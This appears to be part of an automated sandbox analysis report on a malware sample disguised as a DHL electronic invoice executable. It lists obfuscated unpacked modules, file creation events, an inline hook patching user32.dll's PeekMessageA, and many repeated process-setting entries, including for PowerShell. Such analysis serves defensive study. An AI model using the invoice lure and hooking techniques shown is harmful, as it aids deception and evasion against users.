Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3dc1518.4.raw.unpack, flnI6vh5F5KgJAmN7P.cs	High entropy of concatenated method names: 'eLC1GhF12p', 'cUR1ccRkeb', 'RUK10iF8iM', 'qH31nnEFCO', 'MeW1D79W9L', 'cXL1VXoaI6', 'Vdq1Xpg1Fj', 'U5S1vPHwx9', 'AKh19lkhH9', 'JFq1qL631H'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3dc1518.4.raw.unpack, ITXNkKfAkheJrLvZx7.cs	High entropy of concatenated method names: 'UH4wimUJjP', 'AUuwWLrZiO', 'ulEw8dYjKa', 'WDZwGRC4WK', 'KjHwcpH8Rw', 'uxAwnW9lGD', 'FCNwD3iN0H', 'zPk1y04V03', 'PSy14xtr4L', 'aVy1m2njYF'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3dc1518.4.raw.unpack, h95pLbcmrMYoSYW1aG.cs	High entropy of concatenated method names: 'rhPVguHuDB', 'C8MVlc5hI3', 'r6iVIHfkab', 'zduVbErpPx', 'pETVZJ43k1', 'EndV2ar9u2', 'tYwVCgrRSZ', 'rAjVTXc4Se', 'AlVVeFDM96', 'zJpVkp6MjT'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3dc1518.4.raw.unpack, oZmmcPlEf7Kr5ZTKIbS.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'f9N7hfu4eJ', 'TF97S4V1uB', 'rsY7RBl6Fn', 'vfs7OhKwX3', 'ttD7Lr6Zcv', 'SUD7H8PM20', 'qxg7yWZ5yG'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3dc1518.4.raw.unpack, SPGrmyn7rOBCMQMeX2.cs	High entropy of concatenated method names: 'Dispose', 'mc5imJBDdf', 'fF5ur1x64Z', 'GoeooM1Wdu', 'BjkiaRoAgM', 'wavizPI04k', 'ProcessDialogKey', 'IJjudisl4x', 'sYxuivUD9t', 'zIluuLyn41'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3dc1518.4.raw.unpack, YYXEKSll4GrP51KGwta.cs	High entropy of concatenated method names: 'ToString', 'VoA7WF5Fgx', 'dpa78Wom02', 'hlE7ARHLxm', 'Skx7GIiaWV', 'KZy7c3NwM3', 'ImP70ZPEhY', 'aju7ndB8ht', 'n3wjWpgdCtrhm20f4Lm', 'njK48sg5vxf7eH6UUW9'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3dc1518.4.raw.unpack, ze31gmOsu8K2tIeLre.cs	High entropy of concatenated method names: 'n6rDAT4l6G', 'v8sDcujb3R', 'tP1DnhfGxF', 'ThyDVjSkFi', 'kNDDXriLhX', 'OyXnL20H0b', 'gdfnHrHx7Q', 'qkHnyJrIlm', 'fYen4w9lW4', 'pj0nmh2fV8'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3dc1518.4.raw.unpack, tDwXRAWWoZA8mpmZOi.cs	High entropy of concatenated method names: 'vcFVGSc2Xu', 'UfaV0CWkQf', 'llyVDNXL8Z', 'j1jDaKHhv8', 'T8pDzGA9Ta', 'STKVdDAPRx', 'FtXViLnbLj', 'RigVu7fJQx', 'HvEVWT2f6y', 'gg7V8wAWer'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3dc1518.4.raw.unpack, S4ua4hCf7fkEKsZcpl.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Bqoum7wdb5', 'mAYuamCwbZ', 'hkMuz0xVjA', 'JViWdhidIQ', 'pUSWinrPD1', 'd6vWuo5Wmi', 'CnMWWKhvr1', 'ETBUCeWI2GsYSN6Phx1'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3dc1518.4.raw.unpack, FQDATELQ9X9cFu3Qxc.cs	High entropy of concatenated method names: 'EqqchiLB86', 'P6TcSB6ibv', 'kr6cRCLTOC', 'fZWcO4nWFx', 'hTWcLEq2tg', 'rtXcHqR7Zy', 'oBFcyDqEaE', 'BYoc45jffF', 'w0bcmoKxP3', 'pfVcadN8fN'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3dc1518.4.raw.unpack, Ar37paihswt2Hn41S9.cs	High entropy of concatenated method names: 'ToString', 'bZTMFbE1QE', 'WlPMraL5Kh', 'YFtMfJrOS3', 'IDRMpK9It0', 'F3sMQYkhgB', 'sRoMtC5Cob', 'oOhMjGodq3', 'vUWMJGInYH', 'nvxM69JpvL'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3dc1518.4.raw.unpack, jHYSw6D7D1ChHFbXM1.cs	High entropy of concatenated method names: 'X5BP4MX2u2', 'JKFPaLeMqs', 'l5t1d1ZAwS', 'An11id9Hbx', 'jOPPFqTGNP', 'xrkP537F1h', 'vyuPY2kkKx', 'MR4PhdnkaZ', 'BssPSvjUfi', 'zqePRACpHa'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3dc1518.4.raw.unpack, btiZBU2WViW8aL0Z9p.cs	High entropy of concatenated method names: 'ST5iVHFkyL', 'oUQiXAALng', 'OVyi9Tk8mG', 'mIjiqoEbTL', 'wmMiBSXloa', 'BqyiMHoFHw', 'fDtwmmT5UQ2SNhIaJs', 'EK9u9rb3X4ems9V7Wm', 'qJfiiX8061', 'VGXiWTWBfW'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3dc1518.4.raw.unpack, Mt41L69jeJ6w3Bii6L.cs	High entropy of concatenated method names: 'YTgI1cbLg', 'AAmbJVSgZ', 'Rja24jStr', 'Tg2CZyDEY', 'Nvre2q6SW', 'jLkk77cZ6', 'CO2F00eJP934vG5WOw', 'wCP5FP5jAgwXuKHddk', 'WHiNZ0sryeB98cUNe4', 'ert1kqkRU'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3a03790.3.raw.unpack, ybbGOTR1N80dNbk6Yv.cs	High entropy of concatenated method names: 'obcHojbACJ', 'YnKHTkWS94', 'V3UHNmonbN', 'AuPHVudqss', 'SJBHWK3PRm', 'wkNHA4K7Me', 'L35Hyg9bdX', 'n89HDZAL4k', 'OepHGjo5FD', 'MoeHJmlv16'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3a03790.3.raw.unpack, LinkedList.cs	High entropy of concatenated method names: 'mn8lVDqlu', 'Uxue7aya3', 'KsFMnxhPk', 'ruSPXGSHZ', 'tdQBaRbij', 'ApGpyUtBu', 'Bm5j1f22p4rvC7Eu0G', 'yNLEN1RWrWr7H8C9D4', 'Dispose', 'MoveNext'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3a03790.3.raw.unpack, Architectural.cs	High entropy of concatenated method names: 'Sort', 'Sort', 'u3bDyB9EB', 'jnVG6G0sx', 'NAaJ4PRFw', 'RestoreOriginalBitmap', 'Justy', 'mtp2IE8Nv', 'BfZIR9eYv', 'LowestBreakIteration'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3a03790.3.raw.unpack, MainForm.cs	High entropy of concatenated method names: 'QEHEJ0ZEc', 'xWtkSmxXM', 'uUSoOZRtA', 'Dispose', 'yeRTIpRwj', 'r1YXj5fPVZm4y3Ug3f', 'K4LEmEBCcbAGHf4JhV', 'V6KVEyrTgoasGeD8Zb', 'ymWMMfbpAnyZ7dSZbA', 'IhZliPvmPYrV1280b1'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3a03790.3.raw.unpack, wlMuNfYU9ETTr7SmU1.cs	High entropy of concatenated method names: 'vB7dgYlwIB5e4GotdD', 'h1qusDERcT8AOZTJmN', 'O9t3jXtovErCbWCOlE', 'QkAH1cPp6G', 'RgtTUJcyZL', 's7mHwaN5MT', 'n3AHmM6wxu', 'TUlH3q3EyS', 'XPxHXcdE1G', 'gX3mZCcRjff06'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.53a0000.7.raw.unpack, fJ.cs	High entropy of concatenated method names: 'Jj1', 'MjV', 'VmD', 'OjP', 'AjI', 'sj9', 'jjb', 'yjh', 'RgtTUJcyZL', 'Vmf'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.2a138d0.0.raw.unpack, fJ.cs	High entropy of concatenated method names: 'Jj1', 'MjV', 'VmD', 'OjP', 'AjI', 'sj9', 'jjb', 'yjh', 'RgtTUJcyZL', 'Vmf'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.6f50000.8.raw.unpack, emPKJuT6ymTAqlrrUB.cs	High entropy of concatenated method names: 'GVT1sN4obB', 'MZe1rw9b82', 'm211fk8bKi', 'sFt1pvDVQX', 'fW51hPD7it', 'RXb1QdtEtt', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.6f50000.8.raw.unpack, aHpbjAzSkkTSQPnS7P.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'p26wEmLnU8', 'EUxwBEtvQd', 'MGFwM8JZ3I', 'B98wP1plWa', 'afMw1LK2KE', 'BuEwwiUbN2', 'qtYw7KaeRf'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.6f50000.8.raw.unpack, si6svfR3UjjFCtAc7T.cs	High entropy of concatenated method names: 'jFtnZbjna4', 'J4LnCHQ9xb', 'Xjf0fcGjEO', 'aWP0psQ3uK', 'O5y0QG5IH1', 'R4o0tkOkhh', 'piA0jkfVbp', 'Yqe0JypUP8', 'ePU06Aj9GN', 'GnZ0N0naPF'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.6f50000.8.raw.unpack, lWqnYBNWXpWhpF6WYV.cs	High entropy of concatenated method names: 'DnOETAXyEP', 'kKqEeBJFDd', 'KyJEs4OqRx', 'OeTErkYpu8', 'TGBEpo1no3', 'g8DEQv14mf', 'B6REj6hGqc', 'SjREJekgPd', 'aJVENiyYWd', 'jRvEFXQ4yk'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.6f50000.8.raw.unpack, T4MeU36M6kDM53dRDO.cs	High entropy of concatenated method names: 'Esn0bKvPRP', 'a6y022rw9m', 'orW0TNePdP', 'SJU0eE83F0', 'Bf50BxetkY', 'Y8u0MGhyeY', 'ysv0PR6Ktc', 'J9N019IOEU', 'r780wxDehe', 'coS074KGeW'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.6f50000.8.raw.unpack, KtCP0PlpQVTFkiyZbtF.cs	High entropy of concatenated method names: 'EIewg9v6Pd', 'WvKwlPaxeR', 'SafwIsBUu3', 'Gv7wbb6GDF', 'cK3wZnFxsJ', 'x8pw2YZU3v', 'Cp9wCMmsOS', 'RvHwTDkc38', 'yWRwefFykm', 'aZgwk5JmgM'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.6f50000.8.raw.unpack, EjwV8fVXT718mwuv65.cs	High entropy of concatenated method names: 'BWH1CyDrIBjHAiqmLqD', 'M4C5onDBXPFV1vtuxkK', 'zVjD1mx2DH', 'BF8Dw0hZSt', 'vhoD7NJED6', 'OR79gyDp2a63Q4lIs4n', 'iYHJnZDCC1oaw488MSd'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.6f50000.8.raw.unpack, GXeif0HuBPgo98r8g5.cs	High entropy of concatenated method names: 'sT1BN4qcy6', 'XJyB5JJtwr', 'RUaBhooYvq', 'Ad7BSw16PN', 'ryABrxSgM7', 'Ci0BfS4iIo', 'FUYBp8LOE2', 'pRbBQRjUMA', 'YyTBtN1iHc', 'laTBjCXkn6'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.6f50000.8.raw.unpack, I7B6ZmAJgXiulq8aXx.cs	High entropy of concatenated method names: 'lnxWAlqfqE', 'cpkWGH7WWa', 'yIRWcNI7Qa', 'jp6W0R4YjZ', 'MeMWnYeTB7', 'hChWDUcqX5', 'EddWVAdyMS', 'qTgWXtPly4', 'W2lWvJASOu', 'ApHW9tLcxk'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.6f50000.8.raw.unpack, flnI6vh5F5KgJAmN7P.cs	High entropy of concatenated method names: 'eLC1GhF12p', 'cUR1ccRkeb', 'RUK10iF8iM', 'qH31nnEFCO', 'MeW1D79W9L', 'cXL1VXoaI6', 'Vdq1Xpg1Fj', 'U5S1vPHwx9', 'AKh19lkhH9', 'JFq1qL631H'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.6f50000.8.raw.unpack, ITXNkKfAkheJrLvZx7.cs	High entropy of concatenated method names: 'UH4wimUJjP', 'AUuwWLrZiO', 'ulEw8dYjKa', 'WDZwGRC4WK', 'KjHwcpH8Rw', 'uxAwnW9lGD', 'FCNwD3iN0H', 'zPk1y04V03', 'PSy14xtr4L', 'aVy1m2njYF'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.6f50000.8.raw.unpack, h95pLbcmrMYoSYW1aG.cs	High entropy of concatenated method names: 'rhPVguHuDB', 'C8MVlc5hI3', 'r6iVIHfkab', 'zduVbErpPx', 'pETVZJ43k1', 'EndV2ar9u2', 'tYwVCgrRSZ', 'rAjVTXc4Se', 'AlVVeFDM96', 'zJpVkp6MjT'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.6f50000.8.raw.unpack, oZmmcPlEf7Kr5ZTKIbS.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'f9N7hfu4eJ', 'TF97S4V1uB', 'rsY7RBl6Fn', 'vfs7OhKwX3', 'ttD7Lr6Zcv', 'SUD7H8PM20', 'qxg7yWZ5yG'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.6f50000.8.raw.unpack, SPGrmyn7rOBCMQMeX2.cs	High entropy of concatenated method names: 'Dispose', 'mc5imJBDdf', 'fF5ur1x64Z', 'GoeooM1Wdu', 'BjkiaRoAgM', 'wavizPI04k', 'ProcessDialogKey', 'IJjudisl4x', 'sYxuivUD9t', 'zIluuLyn41'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.6f50000.8.raw.unpack, YYXEKSll4GrP51KGwta.cs	High entropy of concatenated method names: 'ToString', 'VoA7WF5Fgx', 'dpa78Wom02', 'hlE7ARHLxm', 'Skx7GIiaWV', 'KZy7c3NwM3', 'ImP70ZPEhY', 'aju7ndB8ht', 'n3wjWpgdCtrhm20f4Lm', 'njK48sg5vxf7eH6UUW9'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.6f50000.8.raw.unpack, ze31gmOsu8K2tIeLre.cs	High entropy of concatenated method names: 'n6rDAT4l6G', 'v8sDcujb3R', 'tP1DnhfGxF', 'ThyDVjSkFi', 'kNDDXriLhX', 'OyXnL20H0b', 'gdfnHrHx7Q', 'qkHnyJrIlm', 'fYen4w9lW4', 'pj0nmh2fV8'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.6f50000.8.raw.unpack, tDwXRAWWoZA8mpmZOi.cs	High entropy of concatenated method names: 'vcFVGSc2Xu', 'UfaV0CWkQf', 'llyVDNXL8Z', 'j1jDaKHhv8', 'T8pDzGA9Ta', 'STKVdDAPRx', 'FtXViLnbLj', 'RigVu7fJQx', 'HvEVWT2f6y', 'gg7V8wAWer'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.6f50000.8.raw.unpack, S4ua4hCf7fkEKsZcpl.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Bqoum7wdb5', 'mAYuamCwbZ', 'hkMuz0xVjA', 'JViWdhidIQ', 'pUSWinrPD1', 'd6vWuo5Wmi', 'CnMWWKhvr1', 'ETBUCeWI2GsYSN6Phx1'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.6f50000.8.raw.unpack, FQDATELQ9X9cFu3Qxc.cs	High entropy of concatenated method names: 'EqqchiLB86', 'P6TcSB6ibv', 'kr6cRCLTOC', 'fZWcO4nWFx', 'hTWcLEq2tg', 'rtXcHqR7Zy', 'oBFcyDqEaE', 'BYoc45jffF', 'w0bcmoKxP3', 'pfVcadN8fN'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.6f50000.8.raw.unpack, Ar37paihswt2Hn41S9.cs	High entropy of concatenated method names: 'ToString', 'bZTMFbE1QE', 'WlPMraL5Kh', 'YFtMfJrOS3', 'IDRMpK9It0', 'F3sMQYkhgB', 'sRoMtC5Cob', 'oOhMjGodq3', 'vUWMJGInYH', 'nvxM69JpvL'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.6f50000.8.raw.unpack, jHYSw6D7D1ChHFbXM1.cs	High entropy of concatenated method names: 'X5BP4MX2u2', 'JKFPaLeMqs', 'l5t1d1ZAwS', 'An11id9Hbx', 'jOPPFqTGNP', 'xrkP537F1h', 'vyuPY2kkKx', 'MR4PhdnkaZ', 'BssPSvjUfi', 'zqePRACpHa'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.6f50000.8.raw.unpack, btiZBU2WViW8aL0Z9p.cs	High entropy of concatenated method names: 'ST5iVHFkyL', 'oUQiXAALng', 'OVyi9Tk8mG', 'mIjiqoEbTL', 'wmMiBSXloa', 'BqyiMHoFHw', 'fDtwmmT5UQ2SNhIaJs', 'EK9u9rb3X4ems9V7Wm', 'qJfiiX8061', 'VGXiWTWBfW'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.6f50000.8.raw.unpack, Mt41L69jeJ6w3Bii6L.cs	High entropy of concatenated method names: 'YTgI1cbLg', 'AAmbJVSgZ', 'Rja24jStr', 'Tg2CZyDEY', 'Nvre2q6SW', 'jLkk77cZ6', 'CO2F00eJP934vG5WOw', 'wCP5FP5jAgwXuKHddk', 'WHiNZ0sryeB98cUNe4', 'ert1kqkRU'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.2a238e8.1.raw.unpack, fJ.cs	High entropy of concatenated method names: 'Jj1', 'MjV', 'VmD', 'OjP', 'AjI', 'sj9', 'jjb', 'yjh', 'RgtTUJcyZL', 'Vmf'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.39e9970.2.raw.unpack, ybbGOTR1N80dNbk6Yv.cs	High entropy of concatenated method names: 'obcHojbACJ', 'YnKHTkWS94', 'V3UHNmonbN', 'AuPHVudqss', 'SJBHWK3PRm', 'wkNHA4K7Me', 'L35Hyg9bdX', 'n89HDZAL4k', 'OepHGjo5FD', 'MoeHJmlv16'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.39e9970.2.raw.unpack, LinkedList.cs	High entropy of concatenated method names: 'mn8lVDqlu', 'Uxue7aya3', 'KsFMnxhPk', 'ruSPXGSHZ', 'tdQBaRbij', 'ApGpyUtBu', 'Bm5j1f22p4rvC7Eu0G', 'yNLEN1RWrWr7H8C9D4', 'Dispose', 'MoveNext'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.39e9970.2.raw.unpack, Architectural.cs	High entropy of concatenated method names: 'Sort', 'Sort', 'u3bDyB9EB', 'jnVG6G0sx', 'NAaJ4PRFw', 'RestoreOriginalBitmap', 'Justy', 'mtp2IE8Nv', 'BfZIR9eYv', 'LowestBreakIteration'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.39e9970.2.raw.unpack, MainForm.cs	High entropy of concatenated method names: 'QEHEJ0ZEc', 'xWtkSmxXM', 'uUSoOZRtA', 'Dispose', 'yeRTIpRwj', 'r1YXj5fPVZm4y3Ug3f', 'K4LEmEBCcbAGHf4JhV', 'V6KVEyrTgoasGeD8Zb', 'ymWMMfbpAnyZ7dSZbA', 'IhZliPvmPYrV1280b1'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.39e9970.2.raw.unpack, wlMuNfYU9ETTr7SmU1.cs	High entropy of concatenated method names: 'vB7dgYlwIB5e4GotdD', 'h1qusDERcT8AOZTJmN', 'O9t3jXtovErCbWCOlE', 'QkAH1cPp6G', 'RgtTUJcyZL', 's7mHwaN5MT', 'n3AHmM6wxu', 'TUlH3q3EyS', 'XPxHXcdE1G', 'gX3mZCcRjff06'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.5370000.5.raw.unpack, ybbGOTR1N80dNbk6Yv.cs	High entropy of concatenated method names: 'obcHojbACJ', 'YnKHTkWS94', 'V3UHNmonbN', 'AuPHVudqss', 'SJBHWK3PRm', 'wkNHA4K7Me', 'L35Hyg9bdX', 'n89HDZAL4k', 'OepHGjo5FD', 'MoeHJmlv16'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.5370000.5.raw.unpack, LinkedList.cs	High entropy of concatenated method names: 'mn8lVDqlu', 'Uxue7aya3', 'KsFMnxhPk', 'ruSPXGSHZ', 'tdQBaRbij', 'ApGpyUtBu', 'Bm5j1f22p4rvC7Eu0G', 'yNLEN1RWrWr7H8C9D4', 'Dispose', 'MoveNext'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.5370000.5.raw.unpack, Architectural.cs	High entropy of concatenated method names: 'Sort', 'Sort', 'u3bDyB9EB', 'jnVG6G0sx', 'NAaJ4PRFw', 'RestoreOriginalBitmap', 'Justy', 'mtp2IE8Nv', 'BfZIR9eYv', 'LowestBreakIteration'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.5370000.5.raw.unpack, MainForm.cs	High entropy of concatenated method names: 'QEHEJ0ZEc', 'xWtkSmxXM', 'uUSoOZRtA', 'Dispose', 'yeRTIpRwj', 'r1YXj5fPVZm4y3Ug3f', 'K4LEmEBCcbAGHf4JhV', 'V6KVEyrTgoasGeD8Zb', 'ymWMMfbpAnyZ7dSZbA', 'IhZliPvmPYrV1280b1'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.5370000.5.raw.unpack, wlMuNfYU9ETTr7SmU1.cs	High entropy of concatenated method names: 'vB7dgYlwIB5e4GotdD', 'h1qusDERcT8AOZTJmN', 'O9t3jXtovErCbWCOlE', 'QkAH1cPp6G', 'RgtTUJcyZL', 's7mHwaN5MT', 'n3AHmM6wxu', 'TUlH3q3EyS', 'XPxHXcdE1G', 'gX3mZCcRjff06'

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	File created: \dhl factura electronica pendiente documento no 04bb25083.exe
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	File created: \dhl factura electronica pendiente documento no 04bb25083.exe
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	File created: \dhl factura electronica pendiente documento no 04bb25083.exe	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	File created: \dhl factura electronica pendiente documento no 04bb25083.exe	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xEA

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
